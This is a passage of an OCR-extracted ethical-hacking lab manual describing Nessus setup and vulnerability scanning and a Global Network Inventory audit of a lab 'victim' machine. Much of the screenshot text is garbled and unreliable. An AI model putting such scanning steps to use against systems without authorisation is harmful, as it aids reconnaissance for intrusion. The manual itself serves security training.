Nessus needs to be startedto be ableto communicatewith SecurityCenter,whichitwill normallynot dowithout a validActivation Code and plugins FIGURE 10.13: Nessus Obtaining Activation Code 20. 111 Nessus for Home accept the agreement by clicking the Agree button as shown in the following figure. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 176
  • 94. Module 03 - Scanning Networks ■ U s u ilv U tn ir n N tWokerne10NaMiecem • -•‫־■״‬■‫••־‬‫׳‬•‫י‬ . nr.• ■ Bw* ms i 1*vtl ProtoiaioaaJFetid mbbithiiiienjoy You M ! •otu u 1 . The Netare rtoaaafecd do*1*c* gn* youio :w to of 1K0v>yovtoperform < dedR 0( *S* Tw Nes*u»llrtual apCliMK* 1Nmhh HomFnd Mibscilpllon it a■elable lot ptnoia) mm ‫•י‬ a I ( oaty. tt is net lot use by anycommercial oigani/atna t !on 1q«t! c*«»*| or vw * In m * iiw M n i tr.iimvj TrawtoaProgram ft* n•**) 0<>1ri;■itlonf. To »w •^ •# ! 1k* M m ii HowFbwJ »«tncri|40nlot lo »1 «m |fc w cfe* ‘^7‫•׳‬ • ’ to k u « i *to Himi «1«m and bagln thedownlMd prooaat• SU8VCWII0M ACM I Ml NI Product Overview Features N055ue b> Buwwct Naasuster Horn* W*y Up*«rit>to New#* *7 Nesius MoMe A!(n N w m PlufllM • ‫־‬‫״‬‫׳‬ » SuypmW n m •‫■יי‬Ini 01Ope‫״‬nlr*j SyvtMn otw f%9 afA Q 0t Naasaai fA£ lound onarry lenaUc «v*&01 *tov>on1e)1nok1a»«to to• 1Mveelfe ncto4 n! nn u n M o iy K»• • R •**«»•wna#-»*<1 S«4xc>|pl«n You agio• 10r«v *to*•‫״‬ «<«* to•10 T<«atd» to•each•yatoan onwhich You havo inetrJted aPrjntr'Kl Scam*• T‫»׳‬ « r^ (Vg n v tiloni K.:»*iht1i«1iirg 1N» pit^ifcrtcn 0• com w cid v••m S*c»m 2141.1Vauar« a *akiarxj otsnrkalon. You may copy MM !•*get •MMMaM T tN tV t NM«U»Md Tm1U» HonMF«*d S<Mot*«M rw gto M toa<trw h •ad to«*♦ e»»»ootn &e«lng onV Upon eompte^oti ot # * d m f*» J a to T i rigMto d a Itia Pkj£n&piotUfed by Via HomaFaadSubscriptionis Sarnia Rapatto N m ai fAQ VWtlu 0#>lM4 I AQ Deployment Options «#F«dS»t‫־‬vjlp‫־‬i:1‫׳‬(«.actable n*coxtone*«rthtoeSuts<‫־‬i* Ayee^aeannr«ftj (of anapay an! <?AcaM«• tee■■associated- r t»•! Subscriptia• You awv not u&etw H>r‫*׳‬ f sad SutricripUo $1antedtoYoulot »[ ‫ג‬»‫י‬»‫י‬ puipoMStoaacuia Y«u>01 anythirdparty’s,itatrvoifcsor toanyefea■ •■**e'ltt dMMoai !raning h ar*xvp10A 1clon «nv»on‫׳‬n*rr Tm Uaany kta au h ito a Sut«rp#on undatthisSoctnn 2{c1311to•! C is t* Massus Ftegm L«.<lopmcnt and I « & ‫״‬ JM 1a<(1 at fta Subscriptions 10mfle and dav£f 1 apmant and Dtsoibullan TenableI I*«raaI FIGURE 10.14: Nessus Subscription Agreement Fill in the Register a HomeFeed section to obtain an activation code and click Register. 21 GO!ENTER SEARCH TEXT * TENABLE N etw ork Security Partner* Iraining ft(Vrttflratton Resources .Support •print | Register a HomeFeed IM#tl4vjfed >11 U nil! not t T0 stay up to dah» with tlwi N11tit>u1>pljgint you must tt‫־‬•; emai M tdrnt to utilch an activation code wll be *ert Ye shared ‫.׳‬vtth any 3rd pany. ‫ס‬ ■‫־‬ •*•* • con^ □ Check lo receive updates from Tenable Inpqi<;tpr I Iriuihlr I'rorfiirtr Pioduct Ovm v Iow Nos»us Auditor OuntSes N«84ua Ptu^lns Documentation Sample Repona N«5sus FAQ Motde Devices FAQ Deployment Options Nes3u3 Evaluation Training FIGURE 10.15: Nessus Registering HomeFeed 22. The Thank You for Registering window appeals for Tenable Nessus HomeFeed. S l f you do not register your copy of Nessus, you will not receive any new plugins and will be unable to start the Nessus server. Note: The Activation Code is not case sensitive. Ethical H acking and Counterm easures Copyright C by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 177
  • 95. Module 03 - Scanning Networks 217After the initial registration, Nessus will download and compile the plugins obtained from port 443 of plugins.nessus.or gplugins- customers.nessus .org 24. Now enter the activation code received to your email ID and click Next. ‫י‬V j . *>■ «Y«.to‫׳‬. ENTER SEARCH IE ■ ( TENABLE N etw ork S ecurity1 solutions Products Services Partners iraimna & certification Resources Support About tenable Store >print | » sltare Q Tenable C haritable & Training Organization Program Tenable N c tin il S caiH y offers N essus I'rctttw oM f eed 1uMcnp«on• •t no cost to ctiirttabi• orqarization• I Tenable Products Thank You for Registering! nessus Thank jrou tor reghletlag your ‫ז‬eonbit‫׳‬ Ni-viun HomeFeed An emal eonraMng w a actlvafen rode hA» just b««n Mint to you al tie email • M m you ptavWed Please note that »*• Tenable Ne-uut HomeFeed 11 available for hoata u m oolr If you wantto uaa Naasu* at your place of business, you must outcKase the Nessus Proteaaowageed Akemaiet. you nay purchase a subscription to the Nessus Porimolot S arnica and tea* in Mis cioudl Tha N attu i Ponawlci Service does no( require any software download. Foi more artonnafon on tw HomsFeed. Professional eed and Nessus Perimeter Ser.ice. please visit our Discussions Forum. Product Overview Nessus Auditor Bundles Nessus Plugins Documentation Sample Reports Nessus FAQ Mobile Devices FAQ Deployment Options S m u t Evaluation I raining FIGURE 10.16: Nessus Registration Completed 23. Now log in to your email for the activation code provided at the time of registration as shown in the following figure. < d 1X»»S •UfKftCiC X _ uSm9Sma yanooco-n'‫•״‬ rI • •> • » • Sm>Cu1 Oft■•■ > Y A H O O ! MAIL MIMDtlalt •««k «Mr tielalnlfluent ler 1t»e Homefaea Activation Cooe ‫י‬ NMtut K ig iiio i • 10 1■■-•OnHOOOOl* Th■* )0ulw rejnlemj row N n w i k » * x Th*M»«u» H«mef««d gubKtcton •mIIkeep<»1»Netful at»ll>scanting I youusa Hat(us n ‫ג‬ professoral 09301 10u a s*:fess1crulF«c 2ut>cagttc«1 : cu itm*#ou•u new wtepswirascamtriiiHinario‫׳‬o » n»‫׳‬Tns6*one4m C««eusngmt srccediret Strpw. ■cnm tela poem >»»a « m u a 1j ‫•מ׳‬ immipuj-<n» •‫***יי‬*w«,!te.^ffiwr.flgm.'iti'HMiitltinMSua^jaiiifrtiiwft■ Me• in MWmtt'ptsteOir*topMtie U*l anac*»>*‫*׳‬e»a‫״‬»**—t Mtx caaa initaiaiaftBfl Pltat*CCnWtlf*HWtl1t i **ttliaWn &•& NoInlfmel Acoe1»an1w Mm«ui M>t« MeH4J«1n«t|11»1»ncamoi‫׳‬ ‫י*ז«•׳‬f • YoucanAndot>n«1c‫־‬jlst11l»Jt1irutveasnj * FIGURE 10.17: Nessus Registration mail Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 178
  • 96. Module 03 - Scanning Networks 9Wekcm*10Meuvt®[‫ן‬,-" • ‫״‬ F Plugin Feed Registration As• inform ation about new vulnerabilities 18 discovered and released into th e public dom ain, Tenable's research staff designs program s ("plugins”) th at enable Nessus to detect th eir presence. The plugins contain vulnerability Inform ation, th e algorithm to test fo r th e presence of the security Issue, and a set of rem ediation actions. To use Nessus, you need to subscribe to a "Plugin Feed*. You can do so by v o tin g http . / / www.nessus.orQyreolster/ to obtain an A ctivation Code. • To use Nessus at your workplace, pufdiaae a commetGd Prgfcaatonalfccd • To u m N cM uti a t 10 a non ■commercial hom e environm ent, you can get 11 HoiimFeod for free • Tenable SecurltvC entor usore: Enter 'SoairltyC enter* in the field below • To perform offline plugin updates, en ter 'offline' In th e field below Activation Code Please e n ter your Activation C o d e:|9 0 6 1 -0 2 6 6 -9 0 4 6 -S 6 E 4 -l8 £ 4 | x | O ptional Proxy Settings < Prev N ext > IbsdJ Once the pluginsliave beendownloaded and compiled, theNessus GUI toUinitializeand the Nessus serverwillstart FIGURE 10.18: Nessus Applying Activation Code 25. Tlie Registering window appears as shown in die following screenshot. C * *-h o * P • 0 Cc**uttemH S C J wefc<•*‫<׳‬ to m ft * o f x B s ~ ** ■ d 1 R egistering... Registering the scanner with Tenable... FIGURE 10.19: Nessus Registering Activation Code 26. After successful registration click, Next: Download plugins > to download Nessus plugins. *‫יי‬‫־‬‫-׳‬ P • O Ce*rt<*e««o« & C| WetconetoNessus ■ ‫־‬ ‫־‬ ft * o ‫ן‬[x a R eg istering... Successfully registered th e scanner with Tenable. Successfully created the user. | N ext: Download plugin a > | m Nessus server configurationismanagedvia the GUI The nessusdeonf fileisdeprecated In addition, proxysettings, subscription feedregistration, andoffline updates are managedviathe GUI FIGURE 10.20: Nessus Downloading Plugins 27. Nessus will start fetching the plugins and it will install them, it will take time to install plugins and initialization Nessus is fetching th e new est plugin set Pleaae w ait... FIGURE 10.21: Nessus fetching tlie newest plugin set 28. H ie Nessus Log In page appears. Enter the Username and Password given at the time of registration and click Log In. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 179
  • 97. Module 03 - Scanning Networks />. 0 tc nessus L i I «•«‫״‬ ‫׳‬ TENA»Lg FIGURE 10.22: The Nessus Log In screen 29. The Nessus HomeFeed window appears. Click OK. • T A S K 2 Network Scan Vulnerabilities Q For theitemSSHuser name, enter the name ofthe account that isdedicatedto Nessus on eachofthe scan target systems. , 1 / / / 1 nessus inn rm m iv a u u r a h m k MMWuNMy i M W M u w J m i uh (eepenew. M to Itw idTBtH il lr» n m r■ ■ ] • tntimato mayload 10(*iMoaAon w l oaiiUtanter anyoustfton*oroigMtaAofii M • to a PTOtoMknalFMd Subecrtpfcxi ha<• 190* - ?0121)nM1 N M M s*.or*/ nc OK I FIGURE 10.23: Nessus HomeFeed subscription 30. After you successfully log in, the Nessus Daemon window appears as shown in the following screenshot. FIGURE 10.24: The Nessus main screen 31. If you have an Administrator Role, you can see die Users tab, which lists all Users, their Roles, and their Last Logins. m To addanewpolicy, chckPolicies ‫^־־‬ Add Policy. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 180
  • 98. Module 03 - Scanning Networks Newpoliciesare configuredusingthe Credentials tab. FIGURE 10.25: The Nessus administrator view 32. To add a new policy, click Policies ‫>־‬ Add Policy. Fill in the General policy sections, namely, Basic, Scan, Network Congestion, Port Scanners, Port Scan Options, and Performance. ^WARNING: Any changes to the Nessus scanner configuration will affect ALL Nessus users. Edit these options carefully FIGURE 10.26: Adding Policies 33. To configure die credentials of new policy, click die Credentials tab shown in the left pane o f Add Policy. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 181
  • 99. Module 03 - Scanning Networks m The most effective credentials scansarethose for whichthe suppliedcredentials haverootprivileges. FIGURE 10.27: Adding Policies and setting Credentials 34. To select the required plugins, click the Plugins tab in the left pane of Add Policy. ‫׳‬»‫״‬‫״‬.•P W OWBlc/Otr!«c» U r ir 7*‫*י‬18W8 eo?1Ax aunt0+m OCUkttO'ta •• -J’UrKlnl IoiiiiiIii«>>uII.W■..‫וי‬‫ין‬‫יי‬‫יני‬‫י‬O ^ r» u«!j Suit#1«o!v.b Oan ottKdfenwct, (a) 0«neral Vj GenlTOUKBlS*aj‫*׳‬yChK*» y mp-ux L0Ca Seaiftyc ‫׳‬k » i Jurat UjcUSacunty ChKM O A»««l fc**‫״‬ ftM■*2m* L*»r> *>IknU . o 1‫י‬‫ט‬ ‫ע‬ BaiHir r>KM1 &a.*3r Pa« 20AO. Rntrciin ftwaia O 1CWI ■■!Cl 1 Pi■ ‫ן‬— C 1 1 * Mawagwwew Oefcnon O 1&‫ז‬ ‫מ‬ C C H o AfflUM* p*01 (« ‫׳‬Melon O c«1tar« KTTPPra! Sit * ! Hcd H a ttt Rurola DoS <J 120MC tcd P o* F.irVVal 4■, 1 ‫.ו‬ uae VjInentollB |0 f. FS| 3wopn» Trie*matt tc* f*»1Cik r e TCPpoll *22 1WO. ‫יי***ד‬75‫ז‬ ffj»wy U elyB ialK W 5isA O ioai*scrtr **••*nee wmpars ‫־‬TCP&221 ‫ני‬1‫מ>׳»!יא‬ W vwrtce‫־‬CT.17* M t i K t A w k l m s j . TCP.'1781 4‫)ייי*ו.־*יז‬tcfirtocnU xlumg m Ifyouareusing Kerberos,you must configure a Nessus scanner to authenticate a KDC. FIGURE 10.28: Adding Policies and selecting Plugins 35. To configure preferences, click the Preferences tab in the left pane of Add Policy. 36. In the Plugin field, select Database settings from the drop-down list. aIfthe policyis successfullyadded, then the 37. Enter the Login details given at die time of registration. Nessus serverdisplaysthe massage 38. Give the Database SID: 4587, Database port to use: 124, and select Oracle auth type: SYSDBA. 39. Click Submit. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 182
  • 100. FIGURE 10.29: Adding Policies and setting Preferences 40. A message Policy “NetworkScan_Policy‫״‬ w as su ccessfu lly added displays as shown as follows. FIGURE 10.30: The NetworkScan Policy 41. Now, click Scans ‫>־‬ Add to open the Add Scan window. 42. Input the field Name, Type, Policy, and Scan Target 43. 111 Scan Targets, enter die IP address of your network; here in this lab we are scanning 10.0.0.2. 44. Click Launch Scan at die bottom-right of the window. Note: The IP addresses may differ in your lab environment CDTools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks To scan the window, input the field name, type, policy, scan target, and target file. ‘ Ethical H acking and Counterm easures Copyright O by EC-CouncilC E H Lab M anual Page 183
  • 101. Module 03 - Scanning Networks Nessus lias the abilityto save configured scan policies, network taigets, and reports as a .nessus file. FIGURE 10.31: Add Scan 45. The scan launches and starts scanning the network. FIGURE 10.32: Scanning in progress 46. After the scan is complete, click the Reports tab. FIGURE 10.33: Nessus Reports tab 47. Double-click Local Network to view the detailed scan report. ^ ‫י‬..-*— • gMtyi fc ■ d S ' Tools demonstrated in this lab are available in D:CEH• ToolsCEHv8 Module 03 Scanning Networks B n ■ B . Cvwii ' So-Mity ‫*־׳‬•‫״׳‬—«‫״‬ H m n t ■w11■1I K INWI • M m m tn Z •‫נ־י■׳‬ ‫ז*ו‬<•< £ [ l«v> H M H M m jm H9W •xfn H Into 1-01 Iftte U B •MO. In*) Me MUl-a* •*«-—■».»» * «Qi C«uMUrm tlmb«n rf UTMMB1W . i■■— 1 •M M • KTT*I n ■ T!•• M VIWMH W t N « M < N ilr a W U I I M tW M « l W M W lKM l M .-~> •rm *m »y%ttn1•hmlUn C M **• W ill-' McmcC A»: •an itf i LMO10?nb>njlutPu<»Funtu t SIDEwneutan WiMom M m x M t C o t n m k U u i u i m w m m uv» fro^jMren G&a»1fcsKr< CwMot fo r r J . i « H « a ‫־‬r 1r m riCniltoU D ■ 0. 0. ‫=־‬* FIGURE 10.34: Report of the scanned target Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 184
  • 102. Module 03 - Scanning Networks 48. Double-click any result to display a more detailed synopsis, description, security level, and solution. FIGURE 10.35: Report of a scanned target 49. Click the Download Report button in the left pane. 50. You can download available reports with a .n essu s extension from the drop-down list. Dow nload Report X Download Form at 1 C hapters Q If you are manually creating"nessusrc" files, there are several parameters that can be configured to specify SSH authentications. Chapter Selection NotAllowed Cancel Subm it FIGURE 10.36: Download Report with .nessus extension 51. Now, click Log out. 52. 111the Nessus Server Manager, click Stop N essu s Server. P ■ * 6B‫׳‬‫־‬‫׳‬■> M a ■69■ FIGURE 10.37: Log out Nessus Lab Analysis Document all die results and reports gadiered during die lab. G 3 To stop Nessus servei, go to the Nessus Server Manager and click Stop Nessus Server button. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 185
  • 103. Module 03 - Scanning Networks T ool/U tility Inform ation Collected/O bjectives Achieved N essus Scan Target M achine: Local Host Perform ed Scan Policy: Network Scan Policy Target IP Address: 10.0.0.2 Result: Local Host vulnerabilities P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Evaluate the OS platforms that Nessus has builds for. Evaluate whether Nessus works with the security center. 2. Determine how the Nessus license works in a VM (Virtual Machine) environment. Internet Connection Required es0 Platform Supported 0 Classroom □ No □ iLabs C E H Lab M anual Page 186 Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
  • 104. Module 03 - Scanning Networks Auditing Scanning by using Global Network Inventory Global]Seh)•orkInventory is usedas an auditscannerin ~erodeploymentand agent-free environments. It scansconrptiters byIP range, domain, con/p!itersorsingle computers, definedby the GlobalNet!/‫׳‬ork Inventory hostfie. Lab Scenario With the development o f network technologies and applications, network attacks are greatly increasing both in number and severity. Attackers always look for service vulnerabilities and application vulnerabilities on a network 01 servers. If an attacker finds a flaw or loophole in a service run over the Internet, the attacker will immediately use that to compromise the entire system and other data found, thus he or she can compromise other systems 011 the network. Similarly, if the attacker finds a workstation with adm inistrative privileges with faults in that workstation’s applications, they can execute an arbitrary code 01 implant viruses to intensify the damage to the network. As a key technique in network security domain, intrusion detection systems (IDSes) play a vital role of detecting various kinds of attacks and secure the networks. So, as an administrator you shoiild make sure that services do not run as the root user, and should be cautious of patches and updates for applications from vendors 01 security organizations such as CERT and CVE. Safeguards can be implemented so that email client software does not automatically open or execute attachments. 111 this lab, you will learn how networks are scanned using the Global Network Inventory tool. Lab Objectives This lab will show you how networks can be scanned and how to use Global Network Inventory. It will teach you how to: I C O N K E Y a - Valuable information s Test your knowledge Web exercise m Workbook review Use the Global Network Inventory tool Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 187
  • 105. Module 03 - Scanning Networks Lab Environment To cany out die lab, you need: ■ Global Network Inventory tool located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksScanning ToolsGlobal Network Inventory Scanner ■ You can also download the latest version of Global Network Inventory from this link http://www.magnetosoft.com/products/global network inventory/gn i features.htm/ ■ If you decide to download the latest version, then screen sh ots shown in the lab might differ ■ A computer running Windows Server 2012 as attacker (host machine) ■ Another computer running Window Server 2008 as victim (virtual machine) ■ A web browser with Internet access ■ Follow die wizard-driven installation steps to install Global Network Inventory ■ Administrative privileges to run tools Lab Duration Time: 20 Minutes Overview of Global Network Inventory Global Network Inventory is one of die de facto tools for security auditing and testing of firewalls and networks, it is also used to exploit Idle Scanning. Lab Tasks 1. Launch the Start menu by hovering die mouse cursor in the lower-left corner of die desktop. FIGURE 11.1: Windows Server 2012 - Desktop view 2. Click die Global Network Inventory app to open die Global Network Inventory window. ZZ‫ל‬Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks t a s k 1 Scanning the network Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 188
  • 106. Module 03 - Scanning Networks 5 t 9 |‫£־׳‬ Administrator Server M anager Windows PcrwerShell G oogle Chrome Hn>er.V Manager fL m * ‫י‬‫ו‬ *J Control Panel ■F H y p r-V Virtual M achine. SQLServs * £Mww&plcm Com m and Prompt B Mozfla Firefo* S - B u i Search 01.. Global N ec»ort PutBap © H Scan computers by IP range, by domain, single computers, or computers, defined by the Global Network Inventory host file FIGURE 112: Windows Server 2012 - Apps 3. The Global Network Inventory Main window appears as shown in die following figure. 4. The Tip of Day window also appears; click Close. & S can only item s that you need by customizing scan elem ents 5. Turn 011 Windows Server 2008 virtual machine from Hyper-V Manager. FIGURE 11.3 Global Network Inventory Maui Window Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 189
  • 107. Module 03 - Scanning Networks FIGURE 11.4: Windows 2008 Virtual Machine 6. Now switch back to Windows Server 2012 machine, and a new Audit Wizard window will appear. Click Next (01‫־‬in die toolbar select Scan tab and click Launch audit wizard). □ Reliable IP detection and identification of network appliances such as network printers, document centers, hubs, and other devices VI EWS S CAN R E S U L T S , / N C L U D/ N C HI S TORI C R E S U L T S F O R A L L S CANS , I NDI VI DUAL M A C H I N E S , OK 7. Select IP range scan and dien click Next in die Audit Scan Mode wizard. S E L E C T E D NUMBER OF A D D R E S S E S NewAudit Wizard Welcome to the New Audit Wizard Ths wizard will guide you through the process of creating a new inventory audit. To continue, click Next. c Back Next > Cancel FIGURE 11.5: Global Network Inventory new audit wizard Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 190
  • 108. Module 03 - Scanning Networks New Audit Wizard Audit Scan Mode To start a new audfc scan you must choose the scenario that best fits how you w i Is■(^ M be using this scan. O Single address scan Choose this mode i you want to audit a single computer (•) IP range scan Choose this mode i you want to audit a group of computers wttwn a sr>gle IP range O Domain scan Choose this mode i you want to audit computers that are part of the same doma»1(s) 0 Host file scan Choose this mode to audt computers specified in the host file The most common scenario is to audt a group of computers without auditing an IP range or a domain O Export audit agent Choose this mode i you want to audit computers using a domain login script. An audit agent vwi be exported to a shared directory. It can later be used in the domain loain scriot. To continue, cick Next. 1 <Back Nexi > Cancel ______ FIGURE 11.6: Global Network Inventory Audit Scan Mode 8. Set ail IP range scanand then click Next in die IP Range Scan wizard. 9. 111die Authentication Settings wizard, select Connect as and fill the respected credentials of your Windows Server 2008 Virtual Machine, and click Next. Q Fully customizable layouts and color schemes on all views and reports Export data to HTML, XML, Microsoft Excel, and text formats Licenses are network- based rather than user- based. In addition, extra licenses to cover additional addresses can be purchased at any time if required Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 191
  • 109. Module 03 - Scanning Networks £□ The program com es with dozens of customizable reports. New reports can be easily added through the user interface 10. Live die settings as default and click Finish to complete die wizard. (— 7 Ability to generate reports on schedule after every scan, daily, weekly, or monthly (§₪ To configure reports choose Reports | Configure reports from the main menu and select a report from a tree control on a left. Each report can be configured independently 11. It displays die Scanning progress in die Scan progress window. New Audit Wizard Completing the New Audit Wizard You are ready to start a new IP range scan You can set the following options for this scan: @ Donot record unavailablenodes @ Open scan progress dialog when scan starts Rescan nodes that have been successfJy scanned Rescan, but no more than once a day To complete this wizard, dick Finish. < Back Frwh Caned FIGURE 11.9: Global Network Inventory final Audit wizard New Audit Wizard Authentication Settings Specify the authentication settings to use to connect to a remote computer O Connect as cxrrertiy logged on user (•) Connect as Domain User name ad^iriS'3(-‫•׳‬ Password ...............' To continue, d c k Next <Back Nert > Caned FIGURE 11.8 Global Network Inventory Authentication settings Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 192
  • 110. Module 03 - Scanning Networks Q Filtering is a quick way to find a subset of data within a dataset. A filtered gnd displays only the nodes that meet the criteria you specified for a column(s) 12. After completion, scanning results can be viewed as shown in the following figure. 0 Global Network Inventory lets you change grid layout simply by dragging column headers using the mouse. Dropping a header onto the Grouping pane groups data according to the values stored within the "grouped" column FIGURE 11.11: Global Network Inventory result window 13. Now select Windows Server 2008 machine from view results to view individual results. Globa' Network Inventory - Unregistered Pf i e V iew Stan T ools R eports H elp i'v - □]E r BlBWtalri~»EI] u *‫י‬ ? a ‫־־‬A.W‫.־‬‫■־‬!‫־‬N etBIOS | A Shanes JWU ter r C a r r ie ♦ s>«en Q Prr*»M 0r* ^ M an beard Memory pin Memory *rc m n a o n ]Syttern *tat» | A ) HM ftte‫ז»ר‬‫ס‬ rjqr ^ r r tm Networt:•-•‫ד‬.i w ra r r r S car M W i p 1^p#rat:r.r |Q g m erit V e rrfa w 0 3 Mams ‫־‬» R o c e s s a ... *‫.־‬ Comment ‫»־‬ |Tircitamp ‫־י‬ HoatN ... ▼J Status ‫־י‬ M A C A.. d D o r a r W O R K G R O U P [C O U N T-2 ) I P A d d e « : 10.0 0.4 (COUN T-11 Trre sta ro : G£2/2012 3 36:4B PM (C O U N T -1 ) ‫■־‬» C o r o j.. |v/N ULV85(| S ucccii 100-15 5D 001 M ic ro :)* C a V irc c v M Server | IP A d d c m . T 0.0 0.7 (C0UNT-=11 I T rre jta r.3 . & 36. 30 3 2012 >‫׳‬22‫׳‬ PM (C 0 U N T -1 ] •» C « ‫־‬k>j ..[v /N €3SM F||Su c c o m iD ^-O E-D O -C^noalc‘. |lnts(Rl CoiefTM' Solid. H202 Oisplaye^roijp^l^roups [ r 1 R « ju ltjn 1 it0 r y d e p t^ L » !ts< a r 1 0 r ^ Tow?nwr(t) Nirrt - MpIa■addresses $ ‫־‬ W O R K G R O U P :■I 10.0JX7 (W IN-D39... ■m 1 a0JX ‫«־‬ (W 1N-ULV8... iJ Scan progress ‫מ‬ Address Name Percent Tmestamp 1A 0 1 0 .0 .0 .2 — E ! % 08/22/1215 3 8 :3 1 10.0.0.3 E* 08/22/1215:36:23 2 10.0.0.4 W1N-ULY858KHQIP 852 08/22/1215:36:25 3 0.0.0.5‫ו‬ E! * 08/22/1215:36:23 = 4 0 60.0‫ו‬ AOMINPC 9 2 * | 08/22/1215:36:23 5 10.0.0.7 WIN-039MR5HL9E4 9 2 * | 08/22/1215:36:22 6 10.0.08 ! z z 08/22/1215:36:23 7 1 0 .0 0 9 ^ z _ 08/22/1215:36 24 8 1 0 0 0 1 0 W 08/22/1215:36 24 9 1 0 0 0 1 1 E* 08/22/1215:36:24 1 0 1 0 .0 .0 .1 2 ' E* 08/22/1215:36:24 ‫ו‬ ‫ו‬ 10.0.0.13 ' E* 08/22/1215:36:24 2‫ו‬ 10.0.014 I E* 08/22/1215:36:24 rtn m‫ר‬ ic .v .^ 1 @ Open this dialog sdien scan starts Elapsed time: 0 min 6 sec @ Close this dialog when scan completes Scanned nodes: 0/24 @ D onl display completed scans . Sl0p _ Cl°” [ FIGURE 11.10: Global Network Inventory Scanning Progress Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 193
  • 111. Module 03 - Scanning Networks l - l ° W *Global Network Inventory ‫־‬ Unregistered M e v ie w sc a n Tool( R eport < H ?p in - %-u110 | s ^ P i g ¥ B |Q |^ |a |D |B - B # ® , ■'‫מ-י‬ ‫־‬ - Looca d!ss ^ Z»: - ‫־‬‫־‬ Port a rre d o R | System dots |^ Hot fxes3 e ;jr**• certer | 3 ‫׳‬■ Startup ■ Desktoo ^ Orvces 3 NetBIOS | ^ Shores L » ^cvps ^ Lbcre | J Logged c r j Computer 3y3tcn Q Po;c3:cn> '•'ci‫־׳‬ bosd ^ Morer) B8 Scan •unrary §, ^ 0 ‫כ‬‫נ‬ ctn3 C,ctcn (ji) Q Type ‫״‬ HikIM » Sfdlin » MAC A * VbtkIh » CJS * PlOCHZM ( * C0I1HIMf » J Duiein *‫׳‬o ^ e n a jp COUNT-11 JIPAddrew 10.Cl07(COUNT1‫־‬) TncUaro: G/22/2012 3 GG:38 PM (COUNT-1) ■» C5t o j . |V/NC39MR Succc« |D4 BE D9-C|Realck ntefR] CorcfTM' Send: H202! 01011‫ז‬ i‫׳‬a»(j) &S9 3 □ » N e rr c B ‫י^יי‬ AH addresses B- <* WORKGROUP *|^r)0.a7(WN-D3T~1 »• ‫ו‬‫י‬‫נ‬ C J 4 iv>‫׳‬N-ULV3.r. ^jgl^c^roug^l^r^esufc^jto^jegt^oj^ca^o^oc^cdfcj^Re»dr FIGURE 11.12 Global Network Inventory Individual machine results 14. The Scan Summary section gives you a brief summary of die machines diat have been scanned 1- ‫^־‬ rGlobal Network Inventory ‫־‬ Unregistered 1 ^ - s a a w- fie View Scan Tools Reports Melo *5 ' tin>lcr5 k V critoo | jjjjj Logical dska ^ CX>k & tszi m o "Sntcn | j* Networx oocptoo‫נ‬‫כ‬ y w d o n ( j S^eton dot• Hoi tacoe Q S ocu ty ccrto■ J Startup | H Dcckiop ^Sn D ovcoi [# j NoifcKJS | £ Sharoe J t 0 $orgroupt ^ U*«ra fa LoggoCon J - .r%xi*rtyrt»r Q :■^:•;ore ^ M a n te s : * 5 B*S Menoiy cevicee |l# | Scan a n rm y j ^ ® ] ijperatmg Q □ ] e t 1 ▼ a x Hcs4 H.. - Status ‫־״‬ MACA .. ‫■״־‬barrio- ~ OSKsrw ‫־י‬ Prco3350r.. ‫״י‬ Corrmert■‫״‬ -‫־‬JLrJ.‫־‬l‫׳־‬d t'o m a r :v tR r.ii-O U h!el(R)Cme|TM: Seiial H?‫?ר‬ ^ P id ie w : 1C.O.O : CQUNT=1J _________________________ Id Tnrgra«p B/22;2PlZ3-36 ^PM p=DUHr=ll | ;*» Ccnpu |WK-039MR|Succg« rU-BF-D»C:| R ^ rri 1‫־‬ r1‫־‬ rTolall 4em(s) n 1* a □ * a Nam• - ‫■י‬! A1addrestM ^ £ WORKGROUP :mtOiXOi’^N-ULYC" ^c^U^iiitorydepthj FIGURE 11.13: Global Inventory Scan Summary tab 15. The Bios section gives details of Bios settings. Global Network Inventory grid color scheme is completely customizable. You can change Global Network Inventory colors by selecting Tools | Grid colors from main menu and changing colors ‫ם‬ To configure results history level choose Scan | Results history level from the main menu and set the desired history level Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 194
